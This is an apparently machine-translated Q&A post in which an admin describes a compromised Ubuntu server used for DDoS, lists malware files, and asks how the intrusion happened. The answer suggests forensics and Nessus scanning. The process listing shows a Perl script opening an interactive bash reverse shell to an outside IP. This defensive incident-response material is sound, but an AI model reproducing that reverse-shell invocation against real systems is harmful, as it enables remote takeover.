私はubuntuサーバーを実行しています。今日、Amazonの不正使用レポートを通じて、サーバーがハッキングされ、DDoSに使用されていることがわかりました。
サーバー上で次のものを見つけました。
サーバー上にある次の疑わしいファイル。
-rw-r--r-- 1 www-data www-data 759 Dec 21 15:38 weiwei.pl
-rwxrwxrwx 1 www-data www-data 1223123 Dec 26 02:20 huizhen
-rwxr-xr-x 1 www-data www-data 5 Jan 26 14:21 gates.lod
-rwxrwxrwx 1 www-data www-data 1135000 Jan 27 14:09 sishen
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.5
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.4
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.3
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.2
-rw-r--r-- 1 www-data www-data 759 Jan 27 14:36 weiwei.pl.1
-rwxr-xr-x 1 www-data www-data 5 Jan 28 14:00 vga.conf
-rw-r--r-- 1 www-data www-data 119 Jan 29 06:22 cmd.n
-rw-r--r-- 1 www-data www-data 73 Feb 1 01:01 conf.n
次のプロセスが実行されていました
www-data 8292 10629 0 Jan28 ? 00:00:00 Perl /tmp/weiwei.pl 222.186.42.207 5222
www-data 8293 8292 0 Jan28 ? 00:00:00 /bin/bash -i
www-data 8293 8292 0 Jan28 ? 00:00:00 ./huizhen
clamav
を実行すると、/tmp/huizhen
ファイルと/tmp/sishen
ファイルが削除されましたが、プロセスはまだweiwei.pl
と./huizhen
を実行していたため、手動で強制終了しました。
サーバー上で次のサービスを実行しています。
私の想定では、プロセスはTomcatと同じユーザーグループを使用して実行されているため、ハッカーはTomcat/axis2/solrの脆弱性を乗り越えました。
今のところ8080/8443ポートをブロックしており、サーバーを新しいものと交換します。 Tomcatは、nginxを介して別のサーバーからアクセスできます。 nattended-upgrades を使用してセキュリティパッチもインストールしました。
問題は、ハッカーがどのように侵入してトロイの木馬を植えたかを見つける方法です。セキュリティを強化するために他にどのような手順を実行できますか。
これはかなり合理的な質問です。厳密に言えば、それに答える最善の策は、システムをフリーズし、フォレンジックテストを実行することでした。ウイルスの除去を含む、その後の介入は、侵入者が残したパン粉を変更し、場合によっては完全に消去します。
このパスがあなたに開かれなくなったことを考えると、最も良いことは、脆弱性スキャナーを使用することです。これは、ストレステストのために正確に設計されたプログラムieです。あなたのインストール。非常に可能性があります、あなたはただグーグルという用語をVulnerability Scanner
ですが、最もよく知られているのは Nessus です。無料のものからさまざまなライセンスでの有料のものまで、いくつかのバージョンがあり、かなり高価になる可能性があります。
ただし、無料バージョンもあり、 Kali Linux にプリインストールされています。完全に無料ですが、登録する必要があります。私たちの多くは、KaliをラップトップのVMにインストールし、家の外からストレステストを実行して、どの欠陥(=パッチが適用されていない、既知の脆弱性、ほとんどの場合)を確認することで使用します。 )は、インターネットに接続されたサーバーで実行されているアプリケーションに残されます。
インターネット全体でそれを使用する方法を教えるガイドがあり、自分のLAN内(ファイアウォールを信頼している場合)でも、同じPC内からでも、KaliをVMとして実行する場合は試すことができます。